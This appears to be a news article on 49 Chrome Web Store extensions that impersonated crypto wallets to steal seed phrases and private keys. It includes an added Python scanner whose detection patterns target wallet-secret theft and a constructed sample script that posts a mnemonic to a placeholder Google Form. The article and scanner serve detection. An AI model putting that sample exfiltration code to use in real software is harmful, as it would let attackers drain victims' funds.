Google removed 49 Chrome Web Store extensions that posed as legitimate cryptocurrency wallet applications but contained malicious code that stole private crypto wallet keys, mnemonic phrases, and other raw secrets.
Denley says the 49 extensions were created by the same person/group, assumed to be a Russian threat actor.
“While the extensions all function the same, the branding depends on the consumer they are targeting,” Denley said.
The security researcher at MyCrypto claims to have discovered malicious extensions impersonating popular crypto wallets such as Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey.
The malicious extensions all function almost identically to the genuine extensions, but any data a victim enters during configuration is sent to one of the attackers’ servers or to a Google Form.
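As an added illustration (not code from the article or from MyCrypto), the script below performs a static triage of an unpacked extension for the behaviour just described: broad host permissions, secret-related inputs (mnemonic, seed phrase, private key) sitting next to a network send call, and submissions to a Google Form or an unexpected external host. The regex heuristics and the sample manifest and scripts are constructed for this example.

```python
import re
from typing import Dict, List

# Heuristics modelled on the behaviour described above: a fake wallet extension
# collects secrets typed during setup and posts them to an attacker server or a
# Google Form. These patterns are assumptions for triage, not vendor detection rules.
SECRET_INPUT_RE = re.compile(r"mnemonic|seed\s*phrase|recovery\s*phrase|private\s*key|keystore", re.I)
EXFIL_SINK_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|\$\.post|axios\.post)\b")
GOOGLE_FORM_RE = re.compile(r"https?://docs\.google\.com/forms/\S+?formResponse")
EXTERNAL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
BROAD_PERMS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit_extension(manifest: dict, scripts: Dict[str, str], allowed_hosts=()) -> List[str]:
    """Static triage of an unpacked extension. Returns findings; an empty list means nothing flagged."""
    findings: List[str] = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if perms & BROAD_PERMS:
        findings.append(f"manifest: broad host permissions {sorted(perms & BROAD_PERMS)}")
    for name, src in scripts.items():
        for url in GOOGLE_FORM_RE.findall(src):
            findings.append(f"{name}: posts to Google Form {url}")
        # Hosts the wallet vendor legitimately uses can be passed in allowed_hosts.
        hosts = {h.lower() for h in EXTERNAL_HOST_RE.findall(src)} - set(allowed_hosts)
        hosts -= {"docs.google.com"}  # already reported above as a form submission
        if hosts:
            findings.append(f"{name}: contacts external host(s) {sorted(hosts)}")
        if SECRET_INPUT_RE.search(src) and EXFIL_SINK_RE.search(src):
            findings.append(f"{name}: reads wallet secrets and contains a network send sink")
    return findings

# Constructed sample input modelled on the article's description (not real extension code).
SAMPLE_MANIFEST = {"name": "Wallet Helper (constructed sample)",
                   "permissions": ["storage", "<all_urls>"]}
SAMPLE_SCRIPTS = {
    "setup.js": 'const phrase = document.getElementById("mnemonic").value;\n'
                'fetch("https://docs.google.com/forms/d/e/EXAMPLE/formResponse", '
                '{method: "POST", body: new URLSearchParams({"entry.1": phrase})});',
    "ui.js": 'document.title = "Wallet";',
}

if __name__ == "__main__":
    for line in audit_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print("FLAG:", line)
```

A clean extension that only touches the vendor's own backend yields no findings; any flagged line is a reason to inspect the code by hand before trusting it with a seed phrase.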
However, the stolen credentials are not abused immediately. In an experiment, Denley said he entered test account credentials into one of the malicious extensions, but the funds were not stolen right away.
Denley assumes that the threat actor is only interested in stealing funds from high-value accounts, or that the attacker has not worked out how to automate the theft and has to access every account manually.
Denley claims, however, that the theft is happening. The researcher has linked several incidents to some of the 49 extensions recently monitored. Sadly, the victims cannot recover any of the stolen funds because of the irreversible nature of most cryptocurrencies.
Moreover, many more malicious extensions are expected to appear on the Web Store in the coming months from the threat actor behind this campaign.
Denley is now urging users to file CryptoScamDB reports if they suspect any of their Chrome extensions could be behind potential wallet compromises and lost funds. These reports allow Denley and others to identify malicious extensions faster and get them removed from the Chrome Web Store.